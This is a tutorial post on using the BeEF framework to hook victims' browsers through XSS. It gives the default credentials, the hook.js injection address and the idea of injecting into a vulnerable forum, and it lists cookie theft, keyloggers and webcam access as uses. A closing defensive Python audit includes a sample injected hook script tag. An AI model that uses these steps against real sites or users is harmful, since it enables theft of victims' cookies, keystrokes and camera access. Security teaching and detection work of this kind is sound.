BeEF is a powerful professional security tool. Unlike other security tools, BeEF focuses on exploiting vulnerabilities on the browser (client) side to assess the security level of a target. Thanks to BeEF and its XSS attack vector, it is possible to transform a victim into a zombie.
What can we do with BeEF?
- Information retrieval
- Theft of cookies (obviously)
- List of sites / domains visited
- Browser fingerprint (OS, plugins, etc.)
When a user runs BeEF, two components are opened: the user interface and the communication server (CS). These two elements are the basic building blocks of BeEF.
The user interface is where the use of BeEF is controlled. From there, a user can see which victims are online and offline, perform exploits against them, and see the results.
The Communication Server (CS) is the component that communicates via HTTP with infected browsers.
BeEF is available on Linux with the Kali Linux distribution. If you have a Windows computer, I advise you, before going further, to install a Linux distribution (like Kali Linux) on a virtual machine. Just download VMware and an image of Kali Linux. BeEF is already pre-installed on it.
However, you can also install BeEF on Windows; for that, see: http://code.google.com/p/beef/wiki/WindowsInstall
To install it on another Linux distribution or on OSX, see: http://code.google.com/p/beef/wiki/Install
How to use BeEF?
To start, launch the BeEF server in Backtrack. To do this, go to the menu:
Application -> backtrack -> Application -> Exploitation tools -> Social Engineering Tools -> Beef XSS Framework -> Beef
The server will start in a few seconds. You will then have a window with information on the links used for the web interface, as well as the script that you must inject into vulnerable pages.
In the example above, you can see that there are multiple network interfaces. You can now access the administration interface (web interface) using these URLs.
In my case, the administration interface is: http://192.168.230.128:3000/ui/panel and the script to inject is: http://192.168.230.128:3000/hook.js
After launching the administration page, you will see an authentication page. Log in to the BeEF server using the default credentials (beef / beef).
Once connected, you will have a page divided into 4 parts:
- Zombie part: this is where your connected victims are listed.
- Command part: this part contains a number of commands that can be executed on the target, with a colored indicator of their relative safety. This is the most powerful part of the BeEF framework.
- Result part: the results of the executed commands are listed here.
- Description part: here you will find the description of each command.
It now remains to inject hook.js into a vulnerable forum, or simply into a web application that contains an XSS flaw.
However, you can test BeEF locally using the BeEF demo page: http://127.0.0.1:3000/demos/basic.html
After the browser infection, you should see a target added to the left of the administration panel.
Finally, select this browser to display information about the target. You can then launch commands to retrieve the last sites visited, to place a keylogger, or to start the target's camera.
How to protect yourself?
- Updating browsers and plugins is the first rule!
- Install a firewall on your machine
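On the site owner's side, hook.js reaches the victim as a script tag pointing at an origin the site does not control, so rendered pages can be audited for exactly that. The following is an added example, not part of the original article; the allowlist, the forum URL and the sample HTML are constructed assumptions, and only the hook.js address is taken from the text above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: script origins this site legitimately uses (constructed values).
ALLOWED_SCRIPT_ORIGINS = {"https://forum.example", "https://cdn.example"}

def origin(url):
    # scheme://host[:port] of an absolute URL
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()

class ScriptAudit(HTMLParser):
    """Collect every <script src=...> whose origin is not allowlisted."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":  # the parser lowercases tag and attribute names
            return
        src = dict(attrs).get("src")
        if not src:
            return  # inline scripts need a separate review
        # urljoin resolves relative and protocol-relative (//host/...) URLs
        absolute = urljoin(self.page_url, src.strip())
        if origin(absolute) not in ALLOWED_SCRIPT_ORIGINS:
            likely_hook = urlsplit(absolute).path.lower().endswith("/hook.js")
            self.findings.append((absolute, likely_hook))

def audit_page(page_url, html):
    """Return [(script_url, path_is_hook_js), ...] for unexpected scripts."""
    parser = ScriptAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: a forum page where two posts carry injected script tags.
SAMPLE_HTML = """
<html><head><script src="/static/app.js"></script>
<script src="https://cdn.example/lib.min.js"></script></head>
<body><div class="post">Nice thread!
<SCRIPT SRC="http://192.168.230.128:3000/hook.js"></SCRIPT></div>
<div class="post"><script src="//192.168.230.128:3000/x.js"></script></div>
</body></html>
"""

if __name__ == "__main__":
    for url, likely_hook in audit_page("https://forum.example/thread/42", SAMPLE_HTML):
        print("unexpected script:", url, "(hook.js path)" if likely_hook else "")
```

The second finding shows why the audit keys on the origin rather than on the file name: a renamed hook script is still reported.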
BeEF is an easy-to-use and very practical tool. Thanks to BeEF, advanced XSS attacks become easy to perform.
I hope I was able to convince you that the impact of an XSS vulnerability is terrible and that, with a tool like BeEF, you can turn a simple XSS vulnerability into a very dangerous vulnerability.